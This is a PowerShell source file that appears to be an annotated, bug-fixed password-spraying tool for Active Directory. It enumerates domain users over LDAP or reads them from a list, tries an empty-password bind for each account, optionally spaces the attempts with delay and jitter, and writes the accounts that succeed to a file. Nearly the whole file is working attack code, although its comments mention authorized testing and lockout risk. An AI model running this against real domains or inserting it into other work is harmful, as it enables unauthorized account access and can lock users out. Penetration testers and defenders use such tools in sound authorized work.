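function Invoke-SprayEmptyPassword
{
<#
.SYNOPSIS
Builds a list of domain users and tests whether each account accepts an empty password.

.DESCRIPTION
Resolves the target domain (the -Domain value, or the domain of the current security
context), builds the user list either from an LDAP query or from a text file, and hands
it to Invoke-SpraySinglePassword, which performs one empty-password bind per user.

Operational caveats (authorized testing only):
- Every attempt is a failed (or, on success, a real) logon against a domain controller
  and counts towards the account lockout threshold. NEITHER code path reads
  lockoutThreshold or the targets' current badPwdCount; the warning printed for the
  file-based path applies equally to the LDAP-enumerated path.
- -RemoveDisabled only excludes accounts whose userAccountControl already carries the
  ACCOUNTDISABLE (2) or LOCKOUT (16) bit. NOTE(review): the LOCKOUT bit in
  userAccountControl is a computed value and lockoutTime is generally the authoritative
  attribute - confirm before relying on it to avoid locked accounts.
- The optional OutFile receives the names of accounts that accept an empty password;
  treat it as sensitive output.

.PARAMETER UserList
Optional path to a text file with one sAMAccountName per line. Blank lines are ignored.
When omitted, users are enumerated from the domain via LDAP.
.PARAMETER OutFile
Optional path; each user that accepts an empty password is appended to it.
.PARAMETER Domain
Optional DNS domain name. When omitted, the current user's domain is used.
.PARAMETER Delay
Base number of seconds to sleep between attempts (0 = no delay).
.PARAMETER Jitter
Fraction by which Delay is randomly varied (e.g. 0.3 = +/-30%).
.PARAMETER RemoveDisabled
Exclude accounts flagged disabled or locked out in userAccountControl from the LDAP enumeration.
#>
    param(
        [Parameter(Position = 0, Mandatory = $false)]
        [string]
        $UserList = "",
        [Parameter(Position = 1, Mandatory = $false)]
        [string]
        $OutFile,
        [Parameter(Position = 2, Mandatory = $false)]
        [string]
        $Domain = "",
        [Parameter(Position = 3, Mandatory = $false)]
        [int]
        $Delay = 0,
        [Parameter(Position = 4, Mandatory = $false)]
        [double]
        $Jitter = 0,
        [Parameter(Position = 5, Mandatory = $false)]
        [switch]
        $RemoveDisabled
    )

    try
    {
        if ($Domain -ne "")
        {
            # Resolve the domain given with -Domain. GetDomain() is kept purely as an
            # early reachability check; its result is not otherwise needed.
            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain", $Domain)
            $null = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
            $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
        }
        else
        {
            # Fall back to the domain of the current security context.
            $null = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
            $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
            Write-Host "Current Domain is $CurrentDomain"
        }
    }
    catch
    {
        Write-Host -ForegroundColor "red" "[*] Could not connect to the domain. Try specifying the domain name with the -Domain option."
        # 'return', not 'break': a bare 'break' in a function that is not inside a loop
        # terminates whatever loop the *caller* happens to be running.
        return
    }

    if ($UserList -eq "")
    {
        # Root the search at the resolved domain so that -Domain is honoured. The previous
        # version replaced SearchRoot with a path-less DirectoryEntry, which always searched
        # the current domain regardless of -Domain.
        $UserSearcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$CurrentDomain)
        $UserSearcher.PropertiesToLoad.Add("samaccountname") > $null
        if ($RemoveDisabled)
        {
            Write-Host -ForegroundColor "yellow" "[*] Removing disabled users from list."
            # 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND: drop accounts whose
            # userAccountControl has LOCKOUT (16) or ACCOUNTDISABLE (2) set.
            $UserSearcher.Filter = "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=16)(!userAccountControl:1.2.840.113556.1.4.803:=2))"
        }
        else
        {
            $UserSearcher.Filter = "(&(objectCategory=person)(objectClass=user))"
        }
        # Paged results, so domains larger than the server-side size limit are fully enumerated.
        $UserSearcher.PageSize = 1000
        $UserListArray = @()
        foreach ($result in $UserSearcher.FindAll())
        {
            $UserListArray += [string]$result.Properties.samaccountname[0]
        }
    }
    else
    {
        # A supplied list is used verbatim; nothing here consults the lockout policy either.
        Write-Host "[*] Using $UserList as userlist to spray with"
        Write-Host -ForegroundColor "yellow" "[*] Warning: Users will not be checked for lockout threshold."
        try
        {
            # Trim and drop blank lines: an empty username with an empty password would be
            # an anonymous bind, which can succeed and would be reported as a false positive.
            $UserListArray = @(Get-Content $UserList -ErrorAction Stop |
                ForEach-Object { $_.Trim() } |
                Where-Object { $_ -ne "" })
        }
        catch
        {
            # "$_.Exception" inside a string does not evaluate the member access; print the message.
            Write-Host -ForegroundColor "red" $_.Exception.Message
            return
        }
    }

    if ($UserListArray.Count -eq 0)
    {
        Write-Host -ForegroundColor "red" "[*] No users to spray."
        return
    }

    # The former trailing Countdown-Timer block referenced $i, $Passwords and
    # $observation_window, none of which exist in this script (a leftover from the
    # multi-password spray it was derived from); it was dead code and has been removed.
    Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter
}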
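function Invoke-SpraySinglePassword
{
<#
.SYNOPSIS
Attempts an empty-password bind as each user in UserListArray and reports the ones that succeed.

.DESCRIPTION
For every user a DirectoryEntry is created with that username and an empty password and
a bind is forced by reading its Name property; a populated Name is treated as success.
NOTE(review): this relies on a failed bind surfacing as a $null Name rather than as a
terminating error under the caller's $ErrorActionPreference - confirm in the target
environment. Each attempt is an authentication event on the domain controller and counts
towards the account lockout threshold; no lockout policy is consulted here.

.PARAMETER Domain
LDAP path (e.g. "LDAP://DC=corp,DC=local") the bind is made against.
.PARAMETER UserListArray
Usernames (sAMAccountName) to test. Blank entries are skipped.
.PARAMETER OutFile
Optional path; successful usernames are appended to it. Treat it as sensitive output.
.PARAMETER Delay
Base number of seconds to sleep between attempts; 0 disables sleeping.
.PARAMETER Jitter
Fraction by which Delay is randomised; the sleep is an integer drawn from
[(1-Jitter)*Delay, (1+Jitter)*Delay), never below 0.
#>
    param(
        [Parameter(Position = 1)]
        $Domain,
        [Parameter(Position = 2)]
        [string[]]
        $UserListArray,
        [Parameter(Position = 3)]
        [string]
        $OutFile,
        [Parameter(Position = 4)]
        [int]
        $Delay = 0,
        [Parameter(Position = 5)]
        [double]
        $Jitter = 0
    )

    $startTime = Get-Date
    $total = $UserListArray.Count
    # The previous message interpolated an undefined $Password; this script only ever
    # tests the empty password, so say so explicitly.
    Write-Host "[*] Now trying password Empty against $total users. Current time is $($startTime.ToShortTimeString())"
    if ($OutFile -ne "")
    {
        Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
    }

    # The former $UsernameAsPassword branch referenced a variable that is never defined in
    # this script and would have silently changed the tested password; it has been removed.
    $rng = New-Object System.Random
    $tested = 0
    foreach ($User in $UserListArray)
    {
        $tested += 1
        if ([string]::IsNullOrWhiteSpace($User))
        {
            # An empty user plus an empty password is an anonymous bind, which may succeed
            # and would otherwise be printed as a SUCCESS for a nameless account.
            Write-Host -ForegroundColor "yellow" "[*] Skipping empty username entry"
            continue
        }

        $entry = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, "")
        # Reading Name forces the bind; a non-null Name means the empty password was accepted.
        if ($null -ne $entry.name)
        {
            if ($OutFile -ne "")
            {
                Add-Content $OutFile $User
            }
            Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:Empty"
        }
        # Release the underlying COM object rather than leaving it to the finalizer.
        $entry.Dispose()

        Write-Host "$tested of $total users tested"

        if ($Delay -gt 0)
        {
            # Random.Next takes ints; compute explicit bounds so that Jitter > 1 cannot
            # produce a negative sleep and Jitter = 0 still yields exactly Delay.
            $low = [int][math]::Floor((1 - $Jitter) * $Delay)
            $high = [int][math]::Ceiling((1 + $Jitter) * $Delay)
            if ($low -lt 0) { $low = 0 }
            if ($high -le $low) { $high = $low + 1 }
            Start-Sleep -Seconds $rng.Next($low, $high)
        }
    }
}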